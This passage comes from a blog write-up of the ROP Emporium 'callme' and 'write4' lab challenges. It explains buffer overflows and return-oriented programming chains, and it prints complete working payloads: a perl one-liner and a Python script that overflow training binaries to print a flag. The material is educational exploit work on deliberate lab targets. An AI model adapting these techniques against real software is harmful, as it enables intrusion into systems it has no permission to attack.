print "\x40\x07\x40\x00\x00\x00\x00\x00"' > payload

Callmeone and callmetwo being run correctly in gdb

Calling callmethree

The process for building the third stage of the payload is the same as that for the second. We can use gdb to step into callme_two, check the location of $rip that needs to be overwritten, and append the necessary bytes to the payload. Information about the program’s state at callme_two is shown in the screenshot below:

Frame info at callme_two

gdb shows that the location of $rip at callme_two is 0x7fffffffdf38. The space between callme_three's $rip and pwnme's $rsp is 120. Recall that the payload currently has the following structure:

  • 40 bytes of padding
  • 40 bytes required to call callme_one correctly
  • 40 bytes required to call callme_two correctly

The current payload is 120 bytes long and, as previously, the third stage of the payload can be simply appended to the current payload without any padding. The payload structure becomes: padding x 40 + rop gadget + 0xdeadbeefdeadbeef + 0xcafebabecafebabe + 0xd00df00dd00df00d + [email protected] + rop gadget + 0xdeadbeefdeadbeef + 0xcafebabecafebabe + 0xd00df00dd00df00d + [email protected] + rop gadget + 0xdeadbeefdeadbeef + 0xcafebabecafebabe + 0xd00df00dd00df00d + [email protected]

Final Exploit

The following perl one-liner can be used to generate the final payload, which calls callme_one, callme_two, and callme_three with the correct arguments:

perl -e 'print "\x90"x40;
print "\x3c\x09\x40\x00\x00\x00\x00\x00";
print "\xef\xbe\xad\xde\xef\xbe\xad\xde";
print "\xbe\xba\xfe\xca\xbe\xba\xfe\xca";
print "\x0d\xf0\x0d\xd0\x0d\xf0\x0d\xd0";
print "\x20\x07\x40\x00\x00\x00\x00\x00";
print "\x3c\x09\x40\x00\x00\x00\x00\x00";
print "\xef\xbe\xad\xde\xef\xbe\xad\xde";
print "\xbe\xba\xfe\xca\xbe\xba\xfe\xca";
print "\x0d\xf0\x0d\xd0\x0d\xf0\x0d\xd0";
print "\x40\x07\x40\x00\x00\x00\x00\x00";
print "\x3c\x09\x40\x00\x00\x00\x00\x00";
print "\xef\xbe\xad\xde\xef\xbe\xad\xde";
print "\xbe\xba\xfe\xca\xbe\xba\xfe\xca";
print "\x0d\xf0\x0d\xd0\x0d\xf0\x0d\xd0";
print "\xf0\x06\x40\x00\x00\x00\x00\x00";' > payload

Screenshot of the callme binary being run with the payload, resulting in the flag being decrypted and printed to stdout

Challenge 4 - write4

The instructions for the fourth challenge states that the “cat flag.txt” string no longer exists in the binary. On the other hand, there is a function print_file() which can be jumped to via its .plt entry (see callme for more information on the .plt). print_file() takes an argument, which we would like to be “flag.txt”, but we need to find a way of writing that string to memory first. The instructions guide us towards looking at the different sections in the binary, where we might be able to write our attacker-controlled string to, and also to look for a gadget which will give us the ability to “write-what-where”.

Binary sections

An ELF binary is divided into several sections. Common sections include:

  • .text which stores code
  • .data which stores initialised static variables
  • .bss which stores uninitialised static variables and constants

In order to store our attacker-chosen string in memory, it would be useful to write to one of the data sections: .data or .bss. We can use radare2 to read the location of all binary sections alongside their permissions using the iS command:

Reading sections with the radare2 iS command: shows several binary sections including the .data and .bss sections being readable and writeable

The radare2 output shows that both .data and .bss sections are readable and writeable. We can further check information about the sections through gdb using the maintenance info sections command:

Output of running maintenance info sections in gdb, shows that the .bss section does not have the HAS_CONTENTS flag, whereas the .data section does

The output of the command shows that .data has the HAS_CONTENTS flag, which I will assume means that it contains non-zero data. On the other hand, the .bss section does not have this flag, which means that this section should be safe to write to. Therefore we’re going to aim to write our attacker-controlled string, “flag.txt”, to the .bss section.

Write-what-where

But how to write our string to the .bss section? We can use a “write-what-where” gadget. A “write-what-where” gadget is a gadget that will allow writing any arbritrary value to any arbritrary location. A mov [reg1], reg2 instruction is a “write-what-where” gadget, as any value can be loaded into reg2, and any address can be loaded into reg1, allowing for the writing of any value to any address, so long as it’s possible to control the contents of reg1 and reg2.

We can look for a “write-what-where” ROP gadget using regex with radare2. The /R/ command uses regex to search for gadgets. The regex to find a gadget of the format mov [reg1],reg2 or even also mov qword/dword [reg1],reg2 is mov\s.*\s*\[r.*\],\s*r.*. Combined, we can use the command /R/ mov\s.*\s*\[r.*\],\s*r.* to find the following gadget:

Using regex with radare2 to find the write-what-where gadget

Radare2 shows that there is a gadget at 0x00400628 with the instruction mov qword [r14], r15, followed by a ret. The qword in the mov instruction means that 8 bytes will be moved to the address at r14, which is important because “flag.txt” is exactly 8-bytes long. This is perfect, so long as we can find a gadget which will allow us to load arbritrary data to r14 and r15. Fortunately, a quick search for pop r14 yields the following results:

Output of gadgets which will pop r14; pop r15; ret

There exists many gadgets, but the one that I will be using for this blog post will be 0x00400690, which will run pop r14; pop r15; ret;. Both of these gadgets combined will allow us to write our “flag.txt” string to the .bss section.

Writing the payload

Once again, checksec reports that the binary still has PIE disabled. Once again, there is a buffer overflow vulnerability as a result of reading 512-bytes into a 32-byte long array in pwnme(), meaning that we can have a 512-byte long payload.

Ghidra decompilation of pwnme() function

For this section, I’m not going to discuss step-by-step how to overflow the pwnme() function’s rip register, since this has already been covered in the previous challenges: ret2win, split, and callme. However, you might find that debugging pwnme() is slightly more complicated since it’s defined in the shared library, and as a result you cannot set a breakpoint to an address in the function until it has already been resolved by lazy binding. To workaround this, it’s possible to set a breakpoint at the callsite in main, use stepi to step a single instruction to .plt (it’s also possible to just breakpoint the .plt entry), and then use step to step to the beginning of the pwnme() function. From there, the function can be disassembled and you can place a breakpoint based on the disassembly output. Like the previous challenges, check the location of rsp and rip and calculate the difference; the amount given will be the number of padding bytes required for the payload.

Recall that we already have two gadgets:

  • The gadget which will write the value in r15 to the memory address in r14, @ 0x00400628
  • The gadget which will load values to r14 and r15 @ 0x00400690

Our payload’s structure is currently:

  • Padding (to overwrite the space between the beginning of the stack and pwnme’s rip register)
  • The gadget which will load r14 and r15
  • The address of .bss -> will be popped off of the stack and placed in r14
  • “flag.txt” -> will be popped off of the stack and placed into r15
  • The gadget which will write the value in r15 (“flag.txt”) to the memory address in r14 (.bss)

We need a way to call the print_file() function with the “flag.txt” string in .bss. We must find a gadget which will place an address in $rdi, as the contents of this register is used as the argument to print_file(). We can find a pop rdi gadget by using radare2.

pop rdi; ret; gadget found by radare2 at 0x00400693

Finally, since the pop rdi is followed immediately by a ret, we can simply append the address of print_file() to our payload. The overall payload structure becomes:

  • Padding
  • Gadget to load values to r14 and r15
  • .bss address (can be checked using gdb or radare2, see binary sections)
  • “flag.txt”
  • Write-what-where gadget (writing contents of r15 to memaddr in r14)
  • Gadget to load .bss address to rdi
  • print_file() address

Final Exploit

The following python code can be used to create the payload:

"""
padding + gadget_to_load_r14_and_r15 + bss_addr + flag_string + 
gadget_to_write_what_where + gadget_to_load_bss_addr_to_arg_reg + 
bss_addr + print_file_addr
"""

padding = b'\x90'*40
gadget_to_load_r14_and_r15 = b'\x90\x06\x40\x00\x00\x00\x00\x00'
bss_seg = b'\x38\x10\x60\x00\x00\x00\x00\x00'
flag_string = bytes("flag.txt", "ascii")
gadget_to_write_what_where = b'\x28\x06\x40\x00\x00\x00\x00\x00'
gadget_to_load_bss_addr_to_arg_reg = b'\x93\x06\x40\x00\x00\x00\x00\x00'
print_file = b'\x10\x05\x40\x00\x00\x00\x00\x00'

exploit = bytearray(padding)
exploit.extend(gadget_to_load_r14_and_r15)
exploit.extend(bss_seg)
exploit.extend(flag_string)
exploit.extend(gadget_to_write_what_where)
exploit.extend(gadget_to_load_bss_addr_to_arg_reg)
exploit.extend(bss_seg)
exploit.extend(print_file)

print(exploit)
payload = open("payload.txt", "wb")
payload.write(exploit)

Flag printed by write4 when run with the payload

Challenges 5-8

Link to Part 2

Coming soon!

  • There are no more articles
❌